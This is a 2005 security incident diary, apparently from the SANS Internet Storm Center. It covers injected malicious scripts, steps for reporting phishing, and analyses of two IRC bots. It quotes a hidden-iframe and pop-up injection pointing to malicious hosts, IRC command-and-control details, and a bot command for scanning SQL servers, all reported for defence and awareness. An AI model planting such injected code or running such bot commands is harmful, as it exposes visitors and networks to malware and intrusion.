Malicious Script; Phish, Bots and What-Nots

Published: 2005-03-11
Last Updated: 2005-03-12 00:36:23 UTC
by Lorna Hutcheson (Version: 1)
0 comment(s)
Whew, today has been a busy day for everyone out there so it seems. Emails have been pouring in at a steady pace today. First off, we handlers would like to say thanks because we couldn't do it without everyone's help! Sometimes it gets very busy and its hard to respond to each individual email. If you don't get a response to your email, please know that they are all read and very much appreciated. With that said, the above title pretty much sums up this very busy day. Before you continue reading, grab the drink of your choice and relax, this one may take you a while:>)

Malicious Script


In our diary on 4 March, Kyle discussed DNS cache poisoning that was re-directing systems to malicious websites. It appears that these same sites have been embedded as a malicious script on the bottom of some websites. DO NOT CLICK ON THE LINKS. For what ever reason, the sites are still online. The format appears as follows:



<script>window.open("http://www.123xxl.com");</script>

<iframe src="http://www.7sir7.com/abx2.html" frameborder=0 width=0 height=0 marginwidth=0 marginheight=0 scrolling=no></iframe>



If anyone else is seeing this, please let us know.
For more information see the following previous diaries:


http://isc.sans.org/diary.php?date=2005-03-04

http://isc.sans.org/diary.php?date=2005-03-07

Phish, Bots and What-Nots


We received several emails over the past 24 hours, with each reporting a different phishing attempt. Most were the standard "Your account will be suspended" or "Someone may have hijacked your account". Many times we have been asked what to do for phishing attempts. Here is what I do when we get a phishing attempt reported. This is something that anyone can do:



1. Look in the email for where the site is "really" going to. You may have to view the source code to do this. You can also sometimes put the cursor over the URL and look at the bottom of the browser for the real site. You can also hightlight the URL and then create a shortcut to it and view the properties of that shortcut. Whatever it takes to find where it is really wanting you to go to.



2. I then use MasterSnoooper ( http://willmaster.com/master/snooper/ ) to view the source code of the phishing site and validate that it is an active site. Just paste the URL in and let it do the work. I also look around at the source code to see if they are trying to do any other malicious activities while they have you there.



3. Next, you need to find the ISP who is in control of that IP address and get their contact email. You can do this through any lookup, I usually use www.arin.net.



4. Lastly and most important, send a copy of the phishing attempt to the ISP letting them know they have a phishing site being hosted on one of their IP addresses. I also cc the site that the phishing attempt was done against. You can get this off of their "real" website. I also include antiphishing.org (reportphishing@antiphishing.org) and the FTC (spam@uce.gov)


Yes I saved the best for last, Bots! Bot activity seems to be really picking up these days. A thanks to Ken Connelly and Kevin Gennuso who both provided us information and samples for what they have been dealing with. Each of them were dealing with a different piece of malware.



Ken's new friend was connecting to an IRC server that has been shut down. After doing a little reverse engineering on it, it was very evident that there wasn't much capabilities they had thought of to throw in this one. I submitted it to several of the antivirus vendors and the majority of them did not currently detect it. F-Secure identified it as Backdoor.Win32.Rbot.gen. Hopefully more updates will follow from the others. Here is a quick over view of this one from Norman's Sandbox:



[ Network services ]

* Looks for an Internet connection.

* Connects to "team-private.cjb.net" on port 6667 (TCP).

* Connects to IRC server.

* IRC: Uses nickname G0V|80340.

* IRC: Uses username ezkieya.

* IRC: Joins channel #UnderGround.

* IRC: Sets the usermode for user G0V|80340 to +x.




Kevin's bot connected to an IRC server, scanned for SQL boxes and attempted to download spyware. He wrote a very nice analysis up for us of his observations. I haven't gotten a chance to play with that one yet, but here is a quick synopis from Kevin of things he saw in his packet capture:


#179: SYN/ACK - bot connects to IRC server for the first time (several tries before that)

#181: bot joins IRC channel for first time

#229: bot gets confirmation that it joined (name of IRC server is listed as irc.CyberCrime2.gov - idiots)

#237: bot receives command to scan for SQL boxes (that's my guess anyway): +a dvscan mssql 40 3 300 -b -r -s

#239: bot begins scanning my network like CRAZY!

#1221: bot gets command to install spyware (a bunch of URLs preceded by the command +open)


Now, if you made it this far, thanks for hanging with me on this. Initial analysis confirms that you are indeed a true die hard geek! Relax and have a great weekend.


Lorna Hutcheson

Handler on Duty

http://www.iss-md.com

Keywords:
0 comment(s)

Comments


Diary Archives